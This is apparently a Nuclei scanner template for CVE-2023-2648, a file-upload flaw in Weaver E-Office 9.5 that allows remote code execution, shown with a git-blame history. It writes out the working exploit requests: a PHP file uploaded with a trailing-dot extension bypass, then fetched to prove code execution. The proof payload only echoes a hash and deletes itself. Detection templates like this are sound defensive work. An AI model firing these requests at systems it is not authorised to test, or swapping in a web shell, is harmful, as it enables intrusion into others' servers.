nuclei-templates/http/cves/2023/CVE-2023-2648.yaml

id: CVE-2023-2648

info:
  name: Weaver E-Office 9.5 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of Weaver E-Office.
  reference:
    - https://github.com/sunyixuan1228/cve/blob/main/weaver.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2648
    - https://vuldb.com/?ctiid.228777
    - https://vuldb.com/?id.228777
    - https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-2648
    cwe-id: CWE-434
    epss-score: 0.08638
    epss-percentile: 0.94483
    cpe: cpe:2.3:a:weaver:e-office:9.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: weaver
    product: e-office
    fofa-query:
      - app="泛微-EOffice"
      - app="泛微-eoffice"
  tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive
variables:
  file: '{{rand_base(5, "abc")}}'
  string: "CVE-2023-2648"

http:
  - raw:
      - |
        POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
        Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php."
        Content-Type: image/jpeg

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
      - |
        POST /attachment/{{name}}/{{file}}.php  HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'

      - type: status
        part: body_2
        status:
          - 200

    extractors:
      - type: regex
        name: name
        part: body
        group: 1
        regex:
          - "([0-9]+)"
        internal: true
# digest: 4b0a00483046022100a44e0179362f362e905d1f609ac0e6b82953168cbcaa131defd1fd0d955a9ea4022100a1cebf6f55d89a80c2c0827b351c7ae189a38b42c694d472df9df4d44d960929:922c64590222798bb761d5b6d8e72950
Create CVE-2023-2648.yaml 2023-09-05 12:32:23 +00:00			`id: CVE-2023-2648`

			`info:`
			`name: Weaver E-Office 9.5 - Remote Code Execution`
			`author: ritikchaddha`
			`severity: critical`
			`description: \|`
			`A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: \|`
			`Apply the latest security patch or upgrade to a patched version of Weaver E-Office.`
Create CVE-2023-2648.yaml 2023-09-05 12:32:23 +00:00			`reference:`
			`- https://github.com/sunyixuan1228/cve/blob/main/weaver.md`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-2648`
templateman update 2023-10-14 11:27:55 +00:00			`- https://vuldb.com/?ctiid.228777`
			`- https://vuldb.com/?id.228777`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648`
Create CVE-2023-2648.yaml 2023-09-05 12:32:23 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`cve-id: CVE-2023-2648`
Create CVE-2023-2648.yaml 2023-09-05 12:32:23 +00:00			`cwe-id: CWE-434`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`epss-score: 0.08638`
			`epss-percentile: 0.94483`
templateman update 2023-10-14 11:27:55 +00:00			`cpe: cpe:2.3:a:weaver:e-office:9.5:::::::*`
Create CVE-2023-2648.yaml 2023-09-05 12:32:23 +00:00			`metadata:`
			`verified: true`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`max-request: 2`
templateman update 2023-10-14 11:27:55 +00:00			`vendor: weaver`
			`product: e-office`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`fofa-query:`
			`- app="泛微-EOffice"`
			`- app="泛微-eoffice"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive`
Create CVE-2023-2648.yaml 2023-09-05 12:32:23 +00:00			`variables:`
			`file: '{{rand_base(5, "abc")}}'`
updated php fileupload templates 2024-04-15 11:26:37 +00:00			`string: "CVE-2023-2648"`
Create CVE-2023-2648.yaml 2023-09-05 12:32:23 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /inc/jquery/uploadify/uploadify.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9`

			`------WebKitFormBoundarydRVCGWq4Cx3Sq6tt`
			`Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php."`
			`Content-Type: image/jpeg`

updated php fileupload templates 2024-04-15 11:26:37 +00:00			`<?php echo md5("{{string}}");unlink(__FILE__);?>`
Create CVE-2023-2648.yaml 2023-09-05 12:32:23 +00:00			`------WebKitFormBoundarydRVCGWq4Cx3Sq6tt`
			`- \|`
			`POST /attachment/{{name}}/{{file}}.php HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
updated php fileupload templates 2024-04-15 11:26:37 +00:00			`- '{{md5(string)}}'`
Create CVE-2023-2648.yaml 2023-09-05 12:32:23 +00:00
			`- type: status`
			`part: body_2`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`name: name`
			`part: body`
			`group: 1`
			`regex:`
			`- "([0-9]+)"`
			`internal: true`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4b0a00483046022100a44e0179362f362e905d1f609ac0e6b82953168cbcaa131defd1fd0d955a9ea4022100a1cebf6f55d89a80c2c0827b351c7ae189a38b42c694d472df9df4d44d960929:922c64590222798bb761d5b6d8e72950`